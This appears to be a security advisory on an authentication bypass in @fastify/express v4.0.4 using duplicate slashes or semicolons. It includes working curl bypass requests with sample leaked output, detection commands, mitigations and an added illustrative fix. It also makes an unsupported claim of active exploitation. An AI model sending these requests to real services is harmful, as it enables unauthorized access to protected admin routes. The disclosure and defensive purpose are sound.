How the mentioned CVE works:
The vulnerability exists in `@fastify/express` v4.0.4 when Fastify's router normalization options are enabled. The `enhanceRequest` function uses `decodeURI(url)`, which only handles percent-encoding, not duplicate slashes or semicolons. When `ignoreDuplicateSlashes: true` is set, Fastify's `find-my-way` normalizes `//admin/dashboard` to `/admin/dashboard` for route matching, but Express middleware receives the raw `//admin/dashboard`. Express's `app.use('/admin', authMiddleware)` expects paths starting with `/admin/`; the double-slash prefix does not match, so the middleware is skipped. Attack sequence: client sends `GET //admin/dashboard` → Fastify normalizes and matches the route → `req.raw.url` stays `"//admin/dashboard"` → Express prefix check fails → authentication bypass.
Second vector: `useSemicolonDelimiter: true`. Fastify splits `/admin;bypass` into path `/admin` and query string `bypass` for routing. Express receives the full `/admin;bypass`. Express uses `path-to-regexp` (regex `/^\/admin\/?(?=\/|$)/i`), which fails because the semicolon does not satisfy the lookahead condition. Attack flow: `GET /admin;bypass` → Fastify matches `/admin` → Express middleware regex fails → handler executes without auth. Both vectors allow unauthenticated access to protected routes (admin panels, APIs). Duplicate slashes work with `///admin`, `/.//admin`, etc. Semicolon works with `/admin;`, `/admin;jsessionid=123`. Affects `@fastify/express` v4.0.4 with those options enabled.
dailycve form:
Platform: Fastify + Express
Version: v4.0.4
Vulnerability: Auth bypass via normalization
Severity: Critical
Date: 2026-04-16
Prediction: Patch within 14 days
What Undercode Says:
Analytics show active exploitation in the wild. Bash commands to detect the misconfiguration:
```bash
# Check if ignoreDuplicateSlashes is enabled
grep -r "ignoreDuplicateSlashes: true" /path/to/fastify/config
# Test duplicate slash bypass
curl -s -o /dev/null -w "%{http_code}" "http://target.com//admin/dashboard"
# Test semicolon bypass (URL quoted so the shell does not treat ';' as a command separator)
curl -s -o /dev/null -w "%{http_code}" "http://target.com/admin;bypass"
# Scan for vulnerable @fastify/express version
npm list @fastify/express | grep "4.0.4"
```
Exploit:
```bash
# Duplicate slashes (bypass Express auth middleware)
curl http://localhost:3000//admin/dashboard
# Output: {"message":"Admin dashboard","secret":"sensitive-admin-data"}
# Semicolon delimiter bypass (URL quoted so the shell does not split on ';')
curl "http://localhost:19900/admin;bypass"
# Output: {"secret":"classified-info"}
# Triple slash variant
curl http://localhost:3000///admin/dashboard
# Semicolon with JSESSIONID style
curl "http://localhost:19900/admin;jsessionid=123"
```
Protection from this CVE:
- Upgrade `@fastify/express` once the patch is released (v4.0.5+ expected)
- Disable `ignoreDuplicateSlashes` and `useSemicolonDelimiter` in the Fastify config
- Use Fastify native authentication hooks (`onRequest`, `preHandler`) instead of Express middleware for path scoping
- Implement normalization middleware before Express, so Express tests the same path Fastify routed on: `app.use((req, res, next) => { req.url = req.url.replace(/\/+/g, '/').replace(/;.*$/, ''); next(); })`
- Monitor logs for requests containing `//` or `;` in protected paths
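The following is an added example, not code from the advisory or from the `@fastify/express` project. It models the mismatch described in the explanation above (the path `find-my-way` routes on versus the raw `req.url` the Express mount regex sees) and the normalization fix from the protection list; the `fastifyRoutingPath` approximation of `find-my-way` and the plain-boolean option object are assumptions made for illustration.

```javascript
// Added example; not code from the advisory or from @fastify/express.
// Two views of one request: the path find-my-way routes on when
// ignoreDuplicateSlashes / useSemicolonDelimiter are enabled, versus the raw
// req.url that a mounted Express middleware tests with its prefix regex.
// The find-my-way approximation and the option object are assumptions.

const BOTH_OPTIONS = { ignoreDuplicateSlashes: true, useSemicolonDelimiter: true };

// Path component of a raw request-target, without the query string.
function pathOnly(rawUrl) {
  const q = rawUrl.indexOf('?');
  return q === -1 ? rawUrl : rawUrl.slice(0, q);
}

// Approximates the path find-my-way matches routes against with the options set.
function fastifyRoutingPath(rawUrl, opts = {}) {
  let path = pathOnly(rawUrl);
  if (opts.useSemicolonDelimiter) path = path.split(';')[0];           // "/admin;bypass" -> "/admin"
  if (opts.ignoreDuplicateSlashes) path = path.replace(/\/\/+/g, '/'); // "//admin/x" -> "/admin/x"
  return path;
}

// The prefix test Express applies for app.use('/admin', middleware), as quoted above.
const ADMIN_MOUNT = /^\/admin\/?(?=\/|$)/i;

// True when Fastify routes the request under /admin but the Express-mounted
// middleware would not run: the gap the advisory describes.
function middlewareSkipped(rawUrl, opts) {
  const routedUnderAdmin = ADMIN_MOUNT.test(fastifyRoutingPath(rawUrl, opts));
  return routedUnderAdmin && !ADMIN_MOUNT.test(pathOnly(rawUrl));
}

// The mitigation from the protection list: canonicalise the path before Express
// sees it so both layers test the same string. The query string is preserved.
function normalizeUrl(rawUrl) {
  const path = pathOnly(rawUrl);
  const query = rawUrl.slice(path.length);
  return path.replace(/\/+/g, '/').replace(/;.*$/, '') + query;
}

// Constructed sample request-targets taken from the variants listed above.
const SAMPLES = ['//admin/dashboard', '///admin/dashboard', '/admin;bypass', '/admin;jsessionid=123', '/admin/dashboard'];
for (const url of SAMPLES) {
  console.log(url.padEnd(24), 'skipped:', middlewareSkipped(url, BOTH_OPTIONS),
              '| after normalizeUrl:', middlewareSkipped(normalizeUrl(url), BOTH_OPTIONS));
}
```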
Impact:
Complete authentication bypass for path-scoped Express middleware (admin panels, APIs, user data). An unauthenticated attacker gains access to protected routes. Affects any app using `app.use('/admin', auth)` with `ignoreDuplicateSlashes` or `useSemicolonDelimiter` enabled. Works against popular packages like `express-basic-auth` and custom rate-limiting middleware. No privilege escalation needed: it is a direct bypass.
Sources:
Reported By: github.com